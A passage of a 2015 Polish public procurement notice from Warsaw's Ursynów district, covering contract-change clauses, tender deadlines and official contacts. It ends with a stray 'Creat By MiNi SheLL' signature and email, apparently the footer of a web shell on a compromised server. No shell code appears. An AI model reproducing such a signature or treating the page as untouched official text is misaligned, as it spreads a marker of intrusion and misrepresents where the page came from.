f) siły wyższej, przez którą rozumieć się będzie zdarzenie zewnętrzne wobec łączącej Strony więzi prawnej o charakterze niezależnym od Stron, którego Strony nie mogły przewidzieć, i któremu nie mogły zapobiec przy zachowaniu należytej staranności, w szczególności takiej jak: klęski żywiołowe;
- z zastrzeżeniem, iż w powyżej wyspecyfikowanych przypadkach termin wykonania zamówienia przesuwa się o czas trwania zaistniałych powodów.
2)	Zmniejszenia wynagrodzenia umownego z powodu wystąpienia robót zamiennych. Podstawą określenia wynagrodzenia za roboty zamienne będzie protokół konieczności uzgodniony przez Strony, a w przypadku robót dodatkowo kosztorys różnicowy, z uwzględnieniem danych wyjściowych do kosztorysowania określonych poniżej: ceny materiałów - według średnich cen opublikowanych w kwartalnej Informacji cenowej o cenach materiałów budowlanych, i instalacyjnych SEKOCENBUD, obowiązujących w danym okresie i zawierających ceny zakupu, a w przypadku ich braku według cen udokumentowanych i uzgodnionych z Zamawiającym.
3)	Wystąpienia robót - zamiennych bez zmiany wynagrodzenia z powodu: uzasadnionych zmian proponowanych przez Zamawiającego lub Wykonawcę w zakresie sposobu wykonania przedmiotu zamówienia, jeżeli zmiany te są korzystne dla Zamawiającego; aktualizacji materiałów/urządzeń których użycie przewidziano przy realizacji przedmiotu zamówienia z uwagi na zmianę technologiczną; zaprzestania produkcji materiałów/urządzeń, których użycie przewidziano przy realizacji przedmiotu zamówienia; zmiany przepisów prawa budowlanego w trakcie realizacji przedmiotu zamówienia. Dopuszczalne są roboty zamienne w zakresie materiałów na materiały, spełniające parametry techniczne lub o wyższych parametrach niż określone w szczegółowym opisie przedmiotu zamówienia; 
4)	Zmniejszenia wynagrodzenia z tego powodu, że wykonanie części zamówienia nie leży w interesie publicznym, czego nie można było przewidzieć w dniu zawarcia umowy lub z powodu rezygnacji z wykonania części zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ursynow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> - osobiście w Urzędzie m. st. Warszawy Dzielnicy Ursynów, 02-777 Warszawa, Al. KEN 61 pok. nr 334.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.10.2015 godzina 10:30, miejsce: SIEDZIBA ZAMAWIAJACEGO PRZY AL. KEN 61, WYDZIAŁ INFRASTRUKTURY, POK. NR 407.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Osobami ze strony Zamawiającego uprawnionymi do porozumiewania się z Wykonawcami są:
- w zakresie dotyczącym przedmiotu zamówienia:
Krzysztof Krawczyk - główny specjalista w Wydziale Infrastruktury
tel. 22/443-72-39 fax. 22/443-72-20 
e-mail: kr.krawczyk@ursynow.pl
- w zakresie dotyczącym zagadnień formalno-prawnych:
 Aneta Gołębiewska - inspektor w Wydziale Zamówień Publicznych
 tel. 22/ 443-74-91 fax 22/ 443-73-32	
 e-mail: zam_publ@ursynow.pl

2. Otwarcie ofert nastąpi w dniu 02.10.2015 r. o godz. 11:00 w siedzibie Zamawiającego przy  Al. KEN 61 w sali konferencyjnej - pok. nr 424..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com